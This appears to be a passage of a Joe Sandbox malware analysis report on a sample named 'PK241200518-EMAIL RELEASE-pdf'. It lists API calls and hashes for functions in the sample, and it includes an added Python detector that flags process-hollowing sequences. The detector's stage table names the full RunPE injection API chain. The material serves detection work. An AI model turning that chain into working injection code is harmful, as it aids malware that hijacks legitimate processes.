• API ID: __fclose_nolock__getptd_noexit__lock__lock_file
• String ID:
• API String ID: 2800547568-0
• Opcode ID: fac6ed734ebb32e7969bb18766fc0ccae70f020a7f7b2eaf83a7adc4ccd89583
• Instruction ID: 0b2c248b14e9f8783675d019c4f60f56686455598d31a363364a6fccbc59597c
• Opcode Fuzzy Hash: fac6ed734ebb32e7969bb18766fc0ccae70f020a7f7b2eaf83a7adc4ccd89583
• Instruction Fuzzy Hash: 13F09071900B04DADF61AB65D80E7AE7AA06F413F8F24C208A42CAB1D1CFFC99419F52
APIs
• CreateProcessW.KERNELBASE(?,00000000), ref: 00E8391D
• Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00E83941
• ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00E83963
Memory Dump Source
• Source File: 00000000.00000002.2101778828.0000000000E81000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E81000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_e81000_PK241200518-EMAIL RELEASE-pdf.jbxd
Similarity
• API ID: Process$ContextCreateMemoryReadThreadWow64
• String ID:
• API String ID: 2438371351-0
• Opcode ID: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
• Instruction ID: cdad46ce28c58c79c5b0fd129ac1db2ca97e278d455de81b2c0f4c84062014b1
• Opcode Fuzzy Hash: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
• Instruction Fuzzy Hash: B812CF24E14658C6EB24DF64D8507DEB232EF68700F10A0E9910DEB7A5E77A4F81CF5A
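The function at 00E8391D above is the one record in this section where the dump shows the opening of a process-hollowing (RunPE) sequence: CreateProcessW, Wow64GetThreadContext and ReadProcessMemory inside a single function, located in a region the sandbox marks as not backed by a PE image (based on PE: false), which is what the "Writes to foreign memory regions" and "Maps a DLL or memory area into another process" signatures in the overview are built on. The following script is an added example and not code from Joe Sandbox or from the sample: it parses "APIs" records in the format used on this page and flags functions that combine those stages. The three sample records are copied from this section and trimmed to the lines the parser needs; the stage table beyond the three calls the report shows (unmap, alloc, write, SetThreadContext, ResumeThread) is the textbook remainder of the technique and the scoring threshold is an arbitrary choice, both assumptions of the example rather than findings of the report.

```python
"""Flag Joe Sandbox function records whose API list looks like the start of a
process-hollowing (RunPE) sequence.  Added example, not Joe Sandbox code."""
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Sample input: three function records copied from this report section
# (the injection function at 00E8391D, a CRT file-lock helper, the AutoIt
# FreeLibrary wrapper), trimmed to the lines the parser uses.
SAMPLE_REPORT = """\
APIs
• CreateProcessW.KERNELBASE(?,00000000), ref: 00E8391D
• Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00E83941
• ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00E83963
Memory Dump Source
• Source File: 00000000.00000002.2101778828.0000000000E81000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E81000, based on PE: false
• Opcode ID: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
• Instruction Fuzzy Hash: B812CF24E14658C6EB24DF64D8507DEB232EF68700F10A0E9910DEB7A5E77A4F81CF5A
APIs
  • Part of subcall function 00778B28: __getptd_noexit.LIBCMT ref: 00778B28
• __lock_file.LIBCMT ref: 007753EB
• __fclose_nolock.LIBCMT ref: 007753F6
Memory Dump Source
• Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
• Opcode ID: fac6ed734ebb32e7969bb18766fc0ccae70f020a7f7b2eaf83a7adc4ccd89583
• Instruction Fuzzy Hash: 13F09071900B04DADF61AB65D80E7AE7AA06F413F8F24C208A42CAB1D1CFFC99419F52
APIs
• FreeLibrary.KERNEL32(?,?,,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00754E7E
Memory Dump Source
• Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
"""

# One API bullet: optional "Part of subcall function X:" prefix, then Name.MODULE
API_LINE = re.compile(
    r"^\s*•\s*(?P<sub>Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<name>[A-Za-z_][\w@?]*)\.(?P<module>[A-Za-z0-9_]+)")
REF = re.compile(r"\bref:\s*(?P<ref>[0-9A-Fa-f]+)")
SOURCE_LINE = re.compile(r"^\s*•\s*Source File:.*based on PE:\s*(?P<pe>true|false)", re.I)
OPCODE_LINE = re.compile(r"^\s*•\s*Opcode ID:\s*(?P<id>[0-9A-Fa-f]+)")
END_LINE = re.compile(r"^\s*•\s*Instruction Fuzzy Hash:")

# RunPE stages.  The report shows only spawn/context/read for 00E8391D; the
# other stage names are the textbook rest of the technique (assumption).
STAGES = {
    "spawn":   {"CreateProcessW", "CreateProcessA", "CreateProcessInternalW"},
    "context": {"GetThreadContext", "Wow64GetThreadContext"},
    "read":    {"ReadProcessMemory", "NtReadVirtualMemory"},
    "unmap":   {"NtUnmapViewOfSection", "ZwUnmapViewOfSection"},
    "alloc":   {"VirtualAllocEx", "NtAllocateVirtualMemory"},
    "write":   {"WriteProcessMemory", "NtWriteVirtualMemory"},
    "hijack":  {"SetThreadContext", "Wow64SetThreadContext"},
    "resume":  {"ResumeThread", "NtResumeThread"},
}


@dataclass
class ApiCall:
    name: str
    module: str
    ref: str        # call-site address from "ref:"
    subcall: bool   # True when the report attributes it to a subcall


@dataclass
class FunctionRecord:
    apis: List[ApiCall] = field(default_factory=list)
    based_on_pe: Optional[bool] = None   # "based on PE" flag of the dump source
    opcode_id: str = ""


def parse_records(text: str) -> List[FunctionRecord]:
    """Split report text into per-function records ("APIs" ... fuzzy hash)."""
    records, current = [], None
    for line in text.splitlines():
        stripped = line.strip()
        if stripped == "APIs" or (stripped == "Memory Dump Source" and current is None):
            current = FunctionRecord()          # a record may lack the APIs header
            records.append(current)
            continue
        if current is None:
            continue
        if END_LINE.match(line):
            current = None                      # last line of a record
        elif (m := API_LINE.match(line)):
            r = REF.search(line)
            current.apis.append(ApiCall(m["name"], m["module"].upper(),
                                        r["ref"].upper() if r else "", bool(m["sub"])))
        elif (m := SOURCE_LINE.match(line)):
            current.based_on_pe = m["pe"].lower() == "true"
        elif (m := OPCODE_LINE.match(line)):
            current.opcode_id = m["id"].lower()
    return records


def assess(record: FunctionRecord) -> dict:
    """Score one function: which RunPE stages it contains and whether to flag it."""
    names = {a.name for a in record.apis}
    hit = {stage for stage, apis in STAGES.items() if names & apis}
    # Spawn + thread-context access + at least one further cross-process stage.
    # Threshold is an arbitrary choice for this example.
    suspicious = {"spawn", "context"} <= hit and len(hit) >= 3
    return {"suspicious": suspicious, "stages": sorted(hit),
            "missing": sorted(set(STAGES) - hit),
            "unbacked_code": record.based_on_pe is False}   # dump not mapped from a PE


def scan(text: str) -> list:
    """Return (opcode_id, assessment) for every function that trips the rule."""
    return [(rec.opcode_id, assess(rec)) for rec in parse_records(text)
            if assess(rec)["suspicious"]]


if __name__ == "__main__":
    for opcode_id, verdict in scan(SAMPLE_REPORT):
        print(opcode_id[:16], verdict)
```

Run against the full function listing of a report, the script yields one line per function that contains the spawn/context/read combination, together with the stages that are absent from that function; in this sample the write, SetThreadContext and ResumeThread stages are not in function 00E8391D, so they either live in a sibling function or in the code this record reads into. The opcode ID is the key to pivot back to the record's fuzzy hash, which is what the "Similarity" entries are keyed on.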
Memory Dump Source
• Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
• Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 18415a56a0777a5913ad73f402c19e9c00d5eed85c3f7de29c4478945130d109
• Instruction ID: e0ae2cddf1c4d68f3108ca8ea870a1f645df6758f55c9c76dc322b2ccabfaaa1
• Opcode Fuzzy Hash: 18415a56a0777a5913ad73f402c19e9c00d5eed85c3f7de29c4478945130d109
• Instruction Fuzzy Hash: 21619D7060024ADFDB20EF64C885AAAB7F5EF44305F14847DED0697291D7B9ED49CB90
APIs
Memory Dump Source
• Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
• Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
Similarity
• API ID: ProtectVirtual
• String ID:
• API String ID: 544645111-0
• Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
• Instruction ID: 92a90b116c1509bd1db449f2d13dc3774e1b4d3acf5a35fa62cd4dcde5d834aa
• Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
• Instruction Fuzzy Hash: B331A270A00105DBCB1ADF58C484AA9FBA6FB59380B64C6A5E80ACB355D635EDC1DBE0
APIs
Memory Dump Source
• Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
• Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
Similarity
• API ID: ClearVariant
• String ID:
• API String ID: 1473721057-0
• Opcode ID: df381b633be8cda52a2649aa68fe8b61bdaa7b7d89c9988e4472a81e6ec57a6c
• Instruction ID: 9e7b0ae91c54fc03845266f30514e24160297e14af9aa8e4fe5c98b826fd43b5
• Opcode Fuzzy Hash: df381b633be8cda52a2649aa68fe8b61bdaa7b7d89c9988e4472a81e6ec57a6c
• Instruction Fuzzy Hash: 16412B74604341DFDB14DF24C448B5ABBE0BF49315F0989ACE99A8B362C779E849CF52
APIs
Memory Dump Source
• Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
• Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
Similarity
• API ID: _memmove
• String ID:
• API String ID: 4104443479-0
• Opcode ID: 92ca21916ad050ff510af859d9a1f3720c5d431556feb57b4de9c694ca1ed3fe
• Instruction ID: 479efd9af2439c203394b2de0226f7b174ee09fd74bc5bea744c166c918b3dda
• Opcode Fuzzy Hash: 92ca21916ad050ff510af859d9a1f3720c5d431556feb57b4de9c694ca1ed3fe
• Instruction Fuzzy Hash: 93219AB2A04A09EBDF14AF21FC417AA7BB4FF14351F20842DE886C5091EBB485D0D755
APIs
Memory Dump Source
• Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
• Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
Similarity
• API ID: ClearVariant
• String ID:
• API String ID: 1473721057-0
• Opcode ID: cb45412cf5f9b44c5156603ad0f69eb7079ca20f07e4ab8b6213aea07bd5c86e
• Instruction ID: caa01691246514a42a88287b3ec708b9a1249af6fa40184f7f1f388760188410
• Opcode Fuzzy Hash: cb45412cf5f9b44c5156603ad0f69eb7079ca20f07e4ab8b6213aea07bd5c86e
• Instruction Fuzzy Hash: 2D2124B4608341DFCB14EF24C444A5ABBF1BF88315F05896CF98A57722D779E849CB92
Memory Dump Source
• Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
• Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 9f3da643087374d493adc1811755abba64b54cb0ac9a65eb38940e5a54b7e8fd
• Instruction ID: 96f58b31e919e5c1a1ceb4b9b36e42a1bf97583d6756e2589a566a3b9af13a63
• Opcode Fuzzy Hash: 9f3da643087374d493adc1811755abba64b54cb0ac9a65eb38940e5a54b7e8fd
• Instruction Fuzzy Hash: 0701F533505141DFEF295A28AC46AEEF3E8EF803E1B24C06FFD9C96910D6686C448AD1
APIs
• __lock_file.LIBCMT ref: 007748A6
  • Part of subcall function 00778B28: __getptd_noexit.LIBCMT ref: 00778B28
Memory Dump Source
• Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
• Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
Similarity
• API ID: __getptd_noexit__lock_file
• String ID:
• API String ID: 2597487223-0
• Opcode ID: 29d44bb7154f4bee986f30d333f32ae04b8a267310a0827db5cbc59119df312d
• Instruction ID: a91ff8a61890e4725f02ed878167bfcc22a9ea19ad166acdd3be8d6a4891a730
• Opcode Fuzzy Hash: 29d44bb7154f4bee986f30d333f32ae04b8a267310a0827db5cbc59119df312d
• Instruction Fuzzy Hash: E7F0FF71900609EBDF51AFA0CC0E3AE36A0AF003A0F05C404F42C9A191CB7C8950DF53
                                                                                                          APIs
                                                                                                          • FreeLibrary.KERNEL32(?,?,,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00754E7E
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FreeLibrary
                                                                                                          • String ID:
                                                                                                          • API String ID: 3664257935-0
                                                                                                          • Opcode ID: 73751c179ba5b5b290a6f5318cb11792b32cec082316e406a6f612251e4dac97
                                                                                                          • Instruction ID: ebd5ab8591b37384590ea2eb2b44797337798daa1e3c98e24fadaaf00d3ca904
                                                                                                          • Opcode Fuzzy Hash: 73751c179ba5b5b290a6f5318cb11792b32cec082316e406a6f612251e4dac97
                                                                                                          • Instruction Fuzzy Hash: 27F03971501751DFCB349F64E495896BBF1BF1436E3208A3EE9DB82620C7BA9888DF40
                                                                                                          APIs
                                                                                                          • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 007707B0
                                                                                                            • Part of subcall function 00757BCC: _memmove.LIBCMT ref: 00757C06
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: LongNamePath_memmove
                                                                                                          • String ID:
                                                                                                          • API String ID: 2514874351-0
                                                                                                          • Opcode ID: ce86785484ad8685f4765e6e07210e4c47cd32b5ebf8bbf8dcb38b72d1ec2ffa
                                                                                                          • Instruction ID: bd0685ab68bc54c6a2181e59f942642927dd0edfdb947eab9be1ca56fc88ab00
                                                                                                          • Opcode Fuzzy Hash: ce86785484ad8685f4765e6e07210e4c47cd32b5ebf8bbf8dcb38b72d1ec2ffa
                                                                                                          • Instruction Fuzzy Hash: F9E0CD7694512857C720E6589C09FEA77EDDF887A1F0441F6FC0CD7244D964AC8086D0
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __fread_nolock
                                                                                                          • String ID:
                                                                                                          • API String ID: 2638373210-0
                                                                                                          • Opcode ID: 36e66934677415102e9643fee0822ecf6e22e0db5db5ed1a6e3653ba213ae753
                                                                                                          • Instruction ID: b5e5670465abc6e7cdb7d5923412b979a6482bcf21c3069825df118d3413a16b
                                                                                                          • Opcode Fuzzy Hash: 36e66934677415102e9643fee0822ecf6e22e0db5db5ed1a6e3653ba213ae753
                                                                                                          • Instruction Fuzzy Hash: E8E092B0104B049BDB388A24D840BE373E5AB05304F04091DF2AA83241EBA7B841C759
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __wfsopen
                                                                                                          • String ID:
                                                                                                          • API String ID: 197181222-0
                                                                                                          • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                                                          • Instruction ID: 65edaa9bf994371f2ddcc28fbc9e3a5ee9525130c689b49fb50f7337763d79af
                                                                                                          • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                                                          • Instruction Fuzzy Hash: 5AB092B644020CB7CE012A82EC02A493B19AB417A4F408020FB0C18162A6B7A6649A89
                                                                                                          APIs
                                                                                                          • Sleep.KERNELBASE(000001F4), ref: 00E84101
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101778828.0000000000E81000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E81000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_e81000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Sleep
                                                                                                          • String ID:
                                                                                                          • API String ID: 3472027048-0
                                                                                                          • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                          • Instruction ID: 9406944de1f363c4379282a874923a21ec54b2661190e45127a3ad20e51e665f
                                                                                                          • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                          • Instruction Fuzzy Hash: C0E0E67494110EDFDB00EFF4D54D69E7FB4EF14301F100161FD05E2281D6309D508A62
                                                                                                          APIs
                                                                                                            • Part of subcall function 00752612: GetWindowLongW.USER32(?,000000EB), ref: 00752623
                                                                                                          • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 007DCB37
                                                                                                          • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 007DCB95
                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 007DCBD6
                                                                                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 007DCC00
                                                                                                          • SendMessageW.USER32 ref: 007DCC29
                                                                                                          • _wcsncpy.LIBCMT ref: 007DCC95
                                                                                                          • GetKeyState.USER32(00000011), ref: 007DCCB6
                                                                                                          • GetKeyState.USER32(00000009), ref: 007DCCC3
                                                                                                          • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 007DCCD9
                                                                                                          • GetKeyState.USER32(00000010), ref: 007DCCE3
                                                                                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 007DCD0C
                                                                                                          • SendMessageW.USER32 ref: 007DCD33
                                                                                                          • SendMessageW.USER32(?,00001030,?,007DB348), ref: 007DCE37
                                                                                                          • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 007DCE4D
                                                                                                          • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 007DCE60
                                                                                                          • SetCapture.USER32(?), ref: 007DCE69
                                                                                                          • ClientToScreen.USER32(?,?), ref: 007DCECE
                                                                                                          • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 007DCEDB
                                                                                                          • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 007DCEF5
                                                                                                          • ReleaseCapture.USER32 ref: 007DCF00
                                                                                                          • GetCursorPos.USER32(?), ref: 007DCF3A
                                                                                                          • ScreenToClient.USER32(?,?), ref: 007DCF47
                                                                                                          • SendMessageW.USER32(?,00001012,00000000,?), ref: 007DCFA3
                                                                                                          • SendMessageW.USER32 ref: 007DCFD1
                                                                                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 007DD00E
                                                                                                          • SendMessageW.USER32 ref: 007DD03D
                                                                                                          • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 007DD05E
                                                                                                          • SendMessageW.USER32(?,0000110B,00000009,?), ref: 007DD06D
                                                                                                          • GetCursorPos.USER32(?), ref: 007DD08D
                                                                                                          • ScreenToClient.USER32(?,?), ref: 007DD09A
                                                                                                          • GetParent.USER32(?), ref: 007DD0BA
                                                                                                          • SendMessageW.USER32(?,00001012,00000000,?), ref: 007DD123
                                                                                                          • SendMessageW.USER32 ref: 007DD154
                                                                                                          • ClientToScreen.USER32(?,?), ref: 007DD1B2
                                                                                                          • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 007DD1E2
                                                                                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 007DD20C
                                                                                                          • SendMessageW.USER32 ref: 007DD22F
                                                                                                          • ClientToScreen.USER32(?,?), ref: 007DD281
                                                                                                          • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 007DD2B5
                                                                                                            • Part of subcall function 007525DB: GetWindowLongW.USER32(?,000000EB), ref: 007525EC
                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 007DD351
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                                                          • String ID: @GUI_DRAGID$F
                                                                                                          • API String ID: 3977979337-4164748364
                                                                                                          • Opcode ID: 387a1df14d058022d22b70ab17117d7ccf9aaa7d8ab1426ac2f4464bebb2e749
                                                                                                          • Instruction ID: 4f1f6b42ba6ff11bafa6826240e6b276d19c14db795d538319c5d46127b336b0
                                                                                                          • Opcode Fuzzy Hash: 387a1df14d058022d22b70ab17117d7ccf9aaa7d8ab1426ac2f4464bebb2e749
                                                                                                          • Instruction Fuzzy Hash: 6542BD74204282EFD722CF28C849AAABBF5FF49310F14452AF696873A1C739E854DB51
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
